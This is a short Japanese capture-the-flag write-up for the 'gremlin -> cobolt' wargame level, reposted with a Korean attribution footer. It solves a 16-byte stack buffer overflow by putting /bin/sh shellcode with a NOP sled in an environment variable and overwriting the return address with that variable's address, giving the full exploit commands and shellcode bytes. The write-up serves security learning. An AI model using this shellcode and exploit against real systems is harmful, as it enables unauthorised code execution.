gremlin -> cobolt
ヒントは以下のやつ
今度はbufferが16バイト
gdbで見てみよう
strcpyを呼び出している<main+48>の上に引数がある
<main+44>でbufferの位置が[ebp-16]であることをわかった
攻撃してみよう
[ebp]まで16バイト+SFPの4バイト=20バイトを意味なしの文字に上書き
最後の4バイトにシェルコード環境変数のアドレスを入れる
下のコマンドで環境変数を作る
export SHL=`python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
下のプログラムでアドレスを探す
#include <stdio.h>
#include <stdlib.h>
int main() {
printf("%p\n", getenv("SHL"));
return 0;
}
5回ぐらい実行してアドレスが0xbfffff6eであることをわかった
下のコマンドで攻撃する
./cobolt `python -c 'print "A"*20+"\x6e\xff\xff\xbf"'`
クリア
Author And Source
이 문제에 관하여(gremlin -> cobolt), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://velog.io/@bin3635/gremlin-cobolt저자 귀속: 원작자 정보가 원작자 URL에 포함되어 있으며 저작권은 원작자 소유입니다.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)